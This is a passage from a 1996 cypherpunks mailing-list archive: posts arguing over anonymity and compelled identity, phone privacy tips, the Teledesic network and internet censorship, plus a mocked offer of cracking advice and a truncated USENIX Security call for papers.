mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4=
=riHc
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 8 Sep 1996 16:15:05 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Voluntary Disclosure of True Names
In-Reply-To: <199609051749.KAA12335@netcom20.netcom.com>
Message-ID: <Pine.SUN.3.94.960908010349.15194A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 5 Sep 1996, Vladimir Z. Nuri wrote:

> 
> TCM
> >>I think cpunks should hold the view that communication is a matter
> >>of mutual consent between sender and receiver. if a receiver says,
> >>"I don't want any anonymous messages", then should be able to block them.
> >
> >But this is precisely what nearly all of us have been arguing. Namely, that
> >the issue of anonymity vs. providing of True Names, is a matter of
> >_contract_ between parties, not something the government is justified in
> >sticking its nose into.
> 

[...]

> I have seen it repeated here often that somehow anonymity is some kind
> of a "right" that one should have in all kinds of different & important
> transactions, not merely on "cyberspace debate societies". I see
> here frequently the implication that *private*entities* that want to
> enforce identity in their own transactions are somehow implementing
> a corrupt, orwellian system. it sounded to me like that was all
> Dyson was advocating.

"I have seen it repeated here often that somehow compelled identity is
some kind of a 'right' that one should have in all kinds of different &
important transaction, not merely on 'cyberspace debate societies.'  I see
here frequently the implication that *private*entities* that want to
enforce compelled identity in their own transactions are somehow
implementing a corrupt, orwellian system."

(That put it into prespective for you "Vlad?")

> "this is all we really want". what about situations
> where the government requires you to give a physical identity for
> some kind of a license etc? do you think there are no such valid
> situations?

You are twisting, "Vlad."  

If you really think that the issue is one of what specific times
government can demand anonymous transactions you overestimate the role of
government as well as the ability to demand such transactions on a per
situation rather than "as a whole" basis.

For example.  A friend of mine has never had a social security number or a
drivers license with his real name on it.  He has effectively had nothing
but anonymous transactions with anyone who thought that by asking him for
a SSN or driver's license they were getting identity credentials.  His
basis is philsophical, not criminal.  I might add that he lives quite
normally, works for a big mainstream company, and pays taxes.  Every once
in a while he switches his credentials around a bit to avoid paper
trailing.

Please, if you can, point out the harm he is inflicting.

You can't.  There is none.  The harm you can identify is the classic "but
it might be used for... [insert nastiness in vogue this week here]"

> is there any role for a government whatsoever in 
> CryptoAnarchist Utopia and if so, is there any situation in which
> demanding physical identity is reasonable?

It is reasonable for any private parties to refuse to do business with or
otherwise associate with parties who refuse to divulge their identity.
Government in a CryptoAnarchist Utopia will have a very hard time doing
business with anyone if they make this a requirement I think.
 
> >No, Dyson said "Therefore I would favor allowing anonymity -- with some
> >form of traceability only under terms considerably stronger than what are
> >generally required for a wiretap."
> >
> >This implies a role for government, and concomitant restrictions on related
> >anonymity technologies, to provide traceability. So much for mutual
> >agreement between sender and recipient.
> 
> it's clear Dyson hasn't totally thought out her position on anonymity. 
> imho you are reading too much into her existing positions. because of your
> government paranoia, you assume that when someone says they want
> traceability, they are implying they want the government to
> enforce it in all situations. 

Tell me "Vlad," if government won't, who will?
I submit that it is impossible to enforce compelled identity other than
through government.  I also submit that to do it you have to create a
registration process for all mediums.  Pay phones, ISPs, private leaflets,
cash... etc... etc.

So long as cash and payphones exist, (or so long as cash and pre-paid
cellular exists) so will anonymous transactions.

Again, the question is, what are you going to do to prevent, e.g., me,
"Black Unicorn" from publishing as I do now?

> >(I have nothing against senders and recipients agreeing to use the services
> >of some third party in providing ultimate traceability. I'm not wild about
> >the U.S. Government being this third party, paid for by tax money, but so
> >long as it is not required, it's a minor concern to me.
> 
> that's what something like what Dyson has been referring to would suggest
> to me. that is, that's exactly the system she sounded like she was
> loosely advocating.

Crap.  Such a system exists today.  It's called the "filter."

If you don't want to transact with anonymous people, then IGNORE them.
Why impose compelled disclosure on everyone?
 
[Yadda Yadda about Copyright and own-back-patting about "subtlies" that
others will miss deleted.]

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 8 Sep 1996 15:50:36 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Junk Phone Calls, Metered Usage, and Cellphones
In-Reply-To: <ae55ca940302100440b2@[207.167.93.63]>
Message-ID: <Pine.SUN.3.94.960908013420.15194C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Sep 1996, Timothy C. May wrote:

> At 6:08 PM 9/6/96, stewarts@ix.netcom.com wrote:
> 
> >is done because of the Great Drug Hysteria, but I suspect part of it
> >is that pay phone companies don't make money receiving calls,
> >so they don't want to tie up their phones doing that; perhaps if
> >they charged money to receive calls as well as initiate them,
> >they'd be willing to receive calls?
> 
> I am about to start worrying about "junk phone calls" more so than I have
> been. I just bit the bullet and bought a digital cellular phone, with a
> nifty rate plan called Digital Flex: I get unlimited free airtime from 7
> p.m. to 7 a.m. weekdays, and unlimited free airtime all weekend. From south
> of Salinas to north of Santa Rosa and as far east as the Central Valley. In
> other words, the entire Bay Area and outlying communities. I can send and
> receive calls over this entire region, from anywhere in the region (of
> course), without any charges.
> 
> The downside is that calls _from_ or _to_ my phone during "business" hours
> are charged 42 cents a minute, airtime (tying up a channel and all), plus
> whatever other fees may be applicable at each end. Thus, every "junk call"
> I get trying to get me to buy aluminum siding, or to vote Democratic, or to
> switch my long-distance carrier (!), costs me a minimum of 42 cents,
> depending on how fast I can realize who they are and get rid of them ("Let
> me forward you to Jim Bell's AP hotline...").

I suggest doing as I do, that is giving the number to no one at all but
forwarding a public number to the cell phone when you need to.  "Unlimited
forward" allows you to call your own number from anywhere and change
forwarding details.  Quite useful.

> possibilities if this is extended to cover other such areas). The "Digital
> Flex" plan from Cellular One is $20/mo for the basic plan, and then $15/mo
> on top of that for the unlimited evenings and weekends use. (This could
> easily save me the amount I often spend in a month just yakking with
> friends and girlfriends who live over the hill in the Valley.)

Many digital phone have caller ID which you could use to screen for
"urgent" calls when the time is pricy.

You might also consider giving folks a beeper number for "urgent calls"
and you could then call your voice mail from your cellphone to see if you
wish to bother calling back.

This has the added advantage of preventing the tracking of your movement
by determining which "cell" your phone happens to be on at the moment
(phones talk to cells when on but not talking).

> --Tim May

> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 8 Sep 1996 16:04:08 +0800
To: John Anonymous MacDonald <nobody@cypherpunks.ca>
Subject: Re: TWA 800 - Friendly Fire?
In-Reply-To: <199609062048.NAA32689@abraham.cs.berkeley.edu>
Message-ID: <Pine.SUN.3.94.960908014110.15194D-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Sep 1996, John Anonymous MacDonald wrote:

> The latest rumor.
> 
> The message came to me from a man who was Safety Chairman for the
> Airline Pilots Association for many years and he is considered an
> expert on safety.  He would not ever spread idle rumor.  In short,
> he is usually quite certain before saying anything!

Feel free to cite his credentials AFTER you disclose his name.

:)

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 8 Sep 1996 16:14:49 +0800
To: cypherpunks@toad.com
Subject: Deleted Message (fwd)
Message-ID: <Pine.SUN.3.94.960908015156.15194E-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain




--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li

---------- Forwarded message ----------
Date: Sat, 7 Sep 96 16:56:55 -24000
From: MAILER-DAEMON@mqg-smtp3.usmc.mil
To: unicorn@schloss.li
Subject: Deleted Message

To:           "Jon Lebkowsky" <jonl@well.com>
From:         MQG-SMTP3@USMC_MASTERINET@Servers[<unicorn@schloss.li>]
Subject:      Re: What is the EFF doing exactly?
 Message in Transport deleted by:    
	ADMINISTRATOR@USMC_MASTERINET@Servers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 8 Sep 1996 16:15:03 +0800
To: cypherpunks@toad.com
Subject: Deleted Message (fwd)
Message-ID: <Pine.SUN.3.94.960908015252.15194F-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



Cute eh?

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li

---------- Forwarded message ----------
Date: Sat, 7 Sep 96 17:00:49 -24000
From: MAILER-DAEMON@mqg-smtp3.usmc.mil
To: unicorn@schloss.li
Subject: Deleted Message

To:           "Vladimir Z. Nuri" <vznuri@netcom.com>
From:         MQG-SMTP3@USMC_MASTERINET@Servers[<unicorn@schloss.li>]
Subject:      Re: What is the EFF doing exactly?
 Message in Transport deleted by:    
	ADMINISTRATOR@USMC_MASTERINET@Servers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gsi@juno.com (floyd w odem)
Date: Sun, 8 Sep 1996 16:45:15 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <19960907.013714.12478.0.gsi@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


If you would like to get your hands on the 96 hackers catalog its here
and if you want to have it :
    to  get it thriugh the snail mail system send 1.00 to the address
below
    
    to get it through e-mail send .50 to the address below

        Patrick Cummings
        GSI
        6302 Maple st.
        omaha,ne 68104

for more information write to gsi@juno.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 9 Sep 1996 14:07:48 +0800
To: "Vladimir Z. Nuri" <cypherpunks@toad.com
Subject: Re: flimflamery on anonymity
Message-ID: <199609090144.SAA12832@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


james donald:
> > Lucky Green and Dark Unicorn are not accountable.  This is a problem?
> > Because it is a problem "We" need to do something about it, 
(last line is sarcasm for the sarcasm impaired)

At 11:39 AM 9/4/96 -0700, Vladimir Z. Nuri wrote:
> scientists demand that each other be "accountable" for their
> work, for example, and pseudonymous publication simply would
> not be acceptable.

So?  Do you think cypherpunks are planning to go around with
guns and force scientists to pay attention to pseudonymous
scientific publications?

> what about a business
> that simply says, "we choose to require identity among our
> customers, and you can go elsewhere if you disagree". the 
> extremist cypherpunks would be in a quandary over this example,
> because they think they can support anarchocapitalist 
> freedom and anonymity at the same time. they will argue that
> such a business will one day not exist. but shouldn't a business be 
> free to make this decision? rabid cpunks would probably 
> argue against such a decision.

Cypherpunks would argue, do in fact argue, that such a business 
decision will be unwise in the long run for most businesses, 
but that all businesses, like anyone else, have the right to 
make stupid decisions.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sun, 8 Sep 1996 16:59:41 +0800
To: askbill@microsoft.com
Subject: (Fwd) Teledesic, the censored internet in the sky.
Message-ID: <9609080703.AA27267@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

to: Bill Gates, Microsoft Corp.
From: jf_avon@citenet.net
Date: 8 sept 1996
Cc.: cypehrpunks@toad.com

Mr. Gates

Could you please enlighten me about this proposed system and about the
veracity of the following information?

Thanks

jfa

- -- 
Jean-Francois Avon,   Montreal QC Canada
DePompadour, Societe d'Importation Ltee
    Limoges porcelain, silverware and crystal
JFA Technologies
    R&D consultants: physicists technologists and engineers.
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891

- ------- Forwarded Message Follows -------
Date:          Sat, 07 Sep 1996 06:22:47 -0700
To:            cypherpunks@toad.com
From:          "James A. Donald" <jamesd@echeque.com>
Subject:       Teledesic, the censored internet in the sky.

Teledesic, the censored internet in the sky.

Late last year the organized violence monopolies of the world 
voted to give Bill Gates 400 Megahertz of bandwidth, at the same
frequency in each monopoly.  I would guesstimate the value of this
grant to be around ten billion dollars.  

Don't run out and buy Microsoft shares.  When I said Bill Gates, I
meant Bill Gates.  I did not mean Microsoft.

Bill Gates intends to build an internet in the sky, eight hundred
satellites in low earth orbit, each of them with big bandwidth
connections to its nearest neighbors, and each with a four hundred
megahertz connection to each of many squares of ground underneath it.

What caused the collected killers of the world to show such unanimous
generosity towards Bill Gates?

Bill Gates proposed a network that would be completely censorable.

He will not sell pipes to his space backbone, he will sell pipes
from a particular rectangle on the ground to its space backbone.

You would buy a right to connect from any place in a single small
area, not any a right to connect from any place in the world, and Bill
Gates would only sell such rights to government approved
organizations, which would then presumably resell connections to
private individuals -- connections that would first run through
government controlled pipes to check for politically incorrect bits
before they reached Bill Gates' sky backbone.

Of course we should not condemn him too harshly for this:  He needs
approval from Singapore, Iran, France, Germany, Communist China, and
the like, in order to get a single uniform world wide frequency band,
and would be unlikely to get it for any reasonable proposal.

The government pipes in his proposal are as useless as wheels on
a fish, because he promises his ground stations will be quite 
cheap.

Therefore private citizens who are not permitted direct access
to his internet in the sky will feel the impact of tyranny
immediately in their wallets.

Bill Gates internet in the sky will provide short and near
constant latency, therefore telephone connections running
through it should be pretty good, whereas existing internet
phone sucks mightily.

Teledesic is promised to come on line in 2001, though we have
seen how Microsoft meets schedules in the past.  I conjecture 
2006.  I also predict that once the scheme is securely
in place, and jamming it becomes painful, Bill Gates
will find a thousand ways to chisel the government monopoly 
middlemen in his proposal.

I would guess that Motorola's less ambitious Iridium project
will only be a year or two late, but it has little potential
to revolutionize the world the way Bill Gates proposal has.

I expect once the scheme is in place, the government monopolies
in Gate's plan will be under attack both from above and from below.
 ---------------------------------------------------------------------



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQEVAgUBMjIM9MiycyXFit0NAQFv0wf/dD4REx7IYcp/X+seWiDF73Z8Kr37E2IS
rLub4J6XamQw2fMhDzgHiNhpy5HWH/mY1mQjOdhe5kA204aQKHk8ktXCQW6YC7fA
VZCbJ+RJ0pluozWGOOC/hUbYed2vCEBjnjpBHaiFC3dHGVxHF43+L7nlp+RaeRCY
Wb0H6XzwEh3Lei+vMzn/28RIJGabUOPSvDM6vK0AwNyZDXHobg/Ys7bTo9T8odvB
Hz2WR2yBWT1uM1vasHfYDXeFwTvqFbdBv5TWXhNYzCdF6sexRAgD/iofoPmTLxno
FdeVbG9pK09Zd3UDAu8x6Oojgi28S686f49YT0TyyeK8IjXNU9vYxQ==
=F/SH
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 8 Sep 1996 13:21:23 +0800
To: doom13@juno.com (Floyd W Odom)
Subject: Re: talker
In-Reply-To: <19960907.200300.3174.0.Doom13@juno.com>
Message-ID: <199609080305.VAA14256@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


In <19960907.200300.3174.0.Doom13@juno.com>, on 09/07/96 
   at 09:52 PM, doom13@juno.com (Floyd W Odom) said:

=Dear Whoever,

=	I am doom13. If there is anyone out there who is a hacker or would
=like to be one you can talk to me and find out stuff like cracking.
=Just drop a message at doom13@juno.com.

=Doom13

        aw... come on, guy.  in 25 years of the net, I've seen more 
    than a few go down and these are generally not so blatant.  

        up until 15 years ago when some 'strike panic in their 
    hearts' bleeding pansy Wall Street Journal liberal journalist 
    confused hacking with cracking, "hacker" had been a *badge of 
    honor*  

        hacking was a term used among profesionals to define someone
    much more than a programmer, or as one of the definitions put it:

            programmers program code,    hackers tweak code.

        so, take your trolling hooks back to your government leash; 
    go out and have some legitimate fun at your tender young age.

        cypherpunks are *not* crackers; this is a crytographic 
    and political issues relating to cryptography mailing list. 

        join one of the usenet groups such as alt.hacker or 2600 if 
    you want that kind of action.

        have a good day!

--
one of the few things we all share: 
  the utter, corrosive contempt for our elected officials.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Sun, 8 Sep 1996 18:14:18 +0800
To: Enzo Michelangeli <enzo@ima.com>
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To: <Pine.WNT.3.94.960908100847.-490199B-100000@enzohome.ima.com>
Message-ID: <199609080818.DAA09824@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <Pine.WNT.3.94.960908100847.-490199B-100000@enzohome.ima.com>, on 09/08/96 at 10:14 AM,
   Enzo Michelangeli <enzo@ima.com> said:

>On Sat, 7 Sep 1996, Hallam-Baker wrote:

>> There is a massive difference between anonymous speech and anonymous
>> transactions. Anonymous speech can create problems (defamation etc.)
>> but in the main these are not problems the courts are particularly
>> good at dealing with.

>Perhaps, but defamation is an issue that can't be ignored either,
>especially if one tries to build systems based on reputation.

Actually it can. :)

There are already checks and balances in dealing with defamation. Take the following example:

I post a message stating that Phil Zimmerman is a @#$! and that PGP is full of holes.

The immediate responce I would receive from the group would be some rather nasty flames, a couple of questions, most would ignore. Because Phil has a much greater reputation than I do such a blatant defamation would do my reputation much harm while doing his little or no harm. It may actually improve his reputation by the many follow up posting re-affirming his good reputation and his quality product. The only way I could get away with such a message would be to back it up with some strong proof
and the support of others with equal or greater reputation as Phil.

Now if I anonymously post the same message.

The results would be the same as above only no one but the truly "net clueless" would pay any attention to the message. It would be seen as a "troll" and be dealt with accordingly. Once again no damage has been done to Phil's reputation.

Now where things get intrusting is when the rolls are reversed.

Say Phil posts a message that I am a @#$@%!!! and my product is full of holes and that I am realy a NSA stooge.

Many at first would take Phil's word at face value because his reputation is much better than mine. It is only my fault that my reputation is not equal or greater than his. Because of this I now have two choices, I can stay and fight for the harts and minds of the group or I can pack up my toys and go home.

Say I decide to fight. After much work, & many messages I prove that Phil's statements are untrue & manage to convert the group to my side. My reputation has now been greatly inhanced and Phil's reputation has suffered.

In the current system if one repetitively post slander to a group his reputation will be distroyed beyond all repair. There is a genuine disincentive against slander in a system built on reputation. No additional "forces" are needed. The addition of libel laws would actually hurt such a system. The threat of a libel suite could be used to inhibit debate on a topic or questioning of ones reputation. 
 

--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------
 
MR/2 Tag->Windows: The Gates of hell.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 9 Sep 1996 13:43:14 +0800
To: "E. Allen Smith" <cypherpunks@toad.com
Subject: Re: ASEAN nations generally pro-censorship
Message-ID: <199609090157.SAA13884@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


>     _________________________________________________________________
>                 ASEAN FORUM AGREES ON NEED TO POLICE THE NET
>   __________________________________________________________________________

>[...]

>   But the statement suggested there was no agreement on a uniform
>   approach to policing the Internet.

One could argue that the hundred years war was in substantial part
the result of regulatory arbitrage against attempts to censor the 
printing press, that it was in large part an unsuccessful attempt 
to create a uniform standard of censorship by force of arms.


History suggests that there *wont* be a uniform approach on policing
the net.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 8 Sep 1996 14:05:13 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: take the pledge
Message-ID: <199609080352.VAA15611@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


        Alright!   it's a genuine PerryGram!  I'll take the pledge; 
    I've never been able to answer Sternlight without being 
    significantly more offensive than usual!

        attila

 --
 one of the few things we all share: 
   the utter, corrosive contempt for our elected officials.


    --------------------------------------------------------

In, on 07/19/96 
   at 12:06 PM, "Perry E. Metzger" <perry@piermont.com> said:

=Subject: take the pledge


=Look, folks, we all know that 99% of what David Sternlight posts is
=garbage. Why don't we all pledge not to answer any of his posts, and
=then he'll go away. If necessary, someone can be appointed to post a
=weekly "the views expressed by David are junk and we are deliberately
=not replying to them directly" message.

=David has plenty of places to argue with the wind. We don't need to
=add this one.

=I'd like to ask people to publically pledge that they will not reply
=to David's messages. This is such a pledge.

=Perry







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 9 Sep 1996 14:47:42 +0800
To: "Vladimir Z. Nuri" <tcmay@got.net (Timothy C. May)
Subject: Re: Voluntary Disclosure of True Names
Message-ID: <199609090304.UAA20216@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:49 AM 9/5/96 -0700, Vladimir Z. Nuri wrote:
> I have seen it repeated here often that somehow anonymity is some kind
> of a "right" that one should have in all kinds of different & important
> transactions, not merely on "cyberspace debate societies". I see
> here frequently the implication that *private*entities* that want to
> enforce identity in their own transactions are somehow implementing
> a corrupt, orwellian system.

We hold that private entities have the right to attempt to impose corrupt
orwellian systems provided they do not do it at gunpoint, but we doubt 
that they will succeed without guns.


> it sounded to me like that was all
> Dyson was advocating.

"Restrictions much stronger than a warrant" would imply that remailers would
have to keep logs under penalty of law.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 8 Sep 1996 15:31:13 +0800
To: perry@piermont.com
Subject: Re: talker [is illiterate...]
In-Reply-To: <199609080340.XAA19752@jekyll.piermont.com>
Message-ID: <199609080526.XAA17303@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


        Perry, just look at the gall of the *illiterate* jerk; this 
    was his reply to me:

=            You know man I am a profesional so don't reply to me 
=            as a novice or anything. I have been doing this since I 
=            wuz 12. And I'm not young for my age I know alot 
=            about hacking and FYI there's alot you could learn from
=            me so don't think 23 is a young age pal.
=
=            Doom13
=

        takes all kinds.  that's OK, he'll make it to my filter which
dumps it to:

                    in-assholes->/dev/null

        --------------------

In <199609080340.XAA19752@jekyll.piermont.com>, on 09/07/96 
   at 11:40 PM, "Perry E. Metzger" <perry@piermont.com> said:

= Floyd W Odom writes:
= > 	I am doom13. If there is anyone out there who is a hacker or >
= > would like to be one you can talk to me and find out stuff like
= > cracking. > Just drop a message at doom13@juno.com.

= Are you the same jerk who was posting a week ago?

--
one of the few things we all share: 
  the utter, corrosive contempt for our elected officials.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Sun, 8 Sep 1996 21:30:15 +0800
To: Mixmaster Mailing List <cypherpunks@toad.com>
Subject: New type2.list/pubring.mix
Message-ID: <Pine.NEB.3.93.960908062221.438C-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone,

	I just updated the type2.list/pubring.mix combination on
jpunix.com. This update includes the addition of the dustbin and jenanon
remailers Welcome aboard! The files are available by WWW from
www.jpunix.com as well as anonymous FTP from ftp.jpunix.com.

 John Perry - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMjKtO1OTpEThrthvAQHthgQApkbVzoc2NbYMm0U0Wcr3y2LpCY96/adT
2bLBg87S+CIStRHc2XirdjGk97TnN2p/1RBySqOIjH0a9Jajrso2yQYn7nQZ3/2W
wIq2ZrQF1971IeajIBSEmNzD4lhr7Tkqi2WhVGHFEVboMvcp7Nw+wGxOfyaXP6mj
uvZkIFAfDW0=
=O4WA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: raptrtrust@sigmais.com
Date: Sun, 8 Sep 1996 09:18:08 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <1.5.4.16.19960907184914.2e3f7388@sigmais.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello.

I would like to know more about cryptography. Please snd me any information
that you have.

Thank you,
RaptrTrust





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 8 Sep 1996 21:27:47 +0800
To: "E. Allen Smith" <cypherpunks@toad.com
Subject: Re: Edited Edupage, 5 Sep 1996
Message-ID: <2.2.32.19960908113654.00dc4480@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>>CHINA SCREENS OUT "SPIRITUAL POLLUTION" ON THE NET
>>The Beijing government has begun blocking as many as 100 Internet sites that
>>offer material the government deems unsuitable for its citizens -- including
>>dissident viewpoints from Hong Kong and Taiwan, sites sponsored by U.S.
>>major media organizations such as CNN and the Washington Post, and sexually
>>explicit sites such as Playboy and Penthouse.  An official described the
>>blocked sites as suspected purveyors of "spiritual pollution."  (Wall Street
>>Journal 5 Sep 96 B12)

Gee only 100 bad sites on the net out of thousands of web sites.  Looks
cleaner than a hound's tooth to me.  And Germany trying to block two sites a
year (but failing).  At that rate they'll really "shut 'er down."

Note the subtle problem.  With thousands of "bad sites" combined with
bureaucratic sloth the governments of the world are bailing with a teaspoon.
We ca put 'em up faster than they can knock them down particularly since
they can't knock them down at all.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 9 Sep 1996 02:06:37 +0800
To: cypherpunks@toad.com
Subject: Church of Scientology
Message-ID: <3232DBB9.68B3@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Scuttlebut is, CoS rolled over on some pesky ultra-right-wingers as a 
favor to Morris Dees and various scumbag associates. For this, CoS got 
their long-awaited (40-plus years!) federal tax-free status.

This status is big cash, so naturally, interested parties wanted to know 
under what rules did CoS get their tax-free gift, since long-standing 
high court decisions laid out the profit-making business plan of CoS in 
no uncertain terms, explicit and detailed.

Problem is, nobody was able to get the details of the policy change - 
did CoS change their business plan, or did the fed change their rules?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aviel Rubin <rubin@usenix.ORG>
Date: Mon, 9 Sep 1996 01:15:40 +0800
To: rubin@bellcore.com
Subject: ANNOUNCEMENT AND CALL FOR PAPERS - 1998 USENIX Security Conference
Message-ID: <199609081449.HAA03435@usenix.ORG>
MIME-Version: 1.0
Content-Type: text/plain


*************************************************************************

ANNOUNCEMENT AND CALL FOR PAPERS

7th USENIX Security Symposium
January 26-29, 1998
Marriott Hotel-- San Antonio, Texas

Sponsored by the USENIX Association, the UNIX and Advanced Computing
Systems Professional and Technical Association

In cooperation with: The CERT Coordination Center.

Important Dates for Refereed Papers

Papers due:                             September 9, 1997
Author notification:                    October 8,  1997
Camera-ready final papers due:          December 9, 1997

Registration Materials Available:       End October, 1997

(Authors, see "How to Submit a Refereed Paper" below.)

Program Chair
Avi Rubin, Bellcore

Program Committee
Carlisle Adams, Nortel
Dave Balenson, Trusted Information Systems
Steve Bellovin, AT&T Research
Dan Boneh, Princeton University
Diane Coe, Mitre
Ed Felten, Princeton University
Li Gong, JavaSoft
Peter Honeyman, CITI, University of Michigan
Hugo Krawczyk, IBM Watson Labs
Jack Lacy, AT&T Research
Hilarie Orman, DARPA/ITO
Mike Reiter, AT&T Research
David Wagner, University of California, Berkeley

Readers
Katherine T. Fithen, CERT
Trent Jaeger, IBM Watson Labs

Invited talks coordinator: Greg Rose, Qualcomm

Conference home page: <http://www.usenix.org/sec/sec98.html>

OVERVIEW

The goal of this symposium is to bring together researchers,
practitioners, system programmers, and others interested in the 
latest advances in security and applications of cryptography.

This will be a four day symposium with two days of tutorials, 
followed by two days of refereed paper presentations, invited talks,
works-in-progress presentations, and panel discussions.

TUTORIALS Monday and Tuesday, January 26-27

Tutorials for both technical staff and managers will provide
immediately useful, practical information on topics such as local and
network security precautions, what cryptography can and cannot do,
security mechanisms and policies, firewalls and monitoring systems.

If you are interested in proposing a tutorial, contact the tutorial
coordinator, Dan Klein:  phone (412)421-2332 email <dvk@usenix.org>.

TECHNICAL SESSIONS   
Wednesday and Thursday, January 28-29

In addition to the keynote presentation, the technical program includes
refereed papers, invited talks, a work in progress session, and panel
sessions. There will be Birds-of-a-Feather sessions the last two
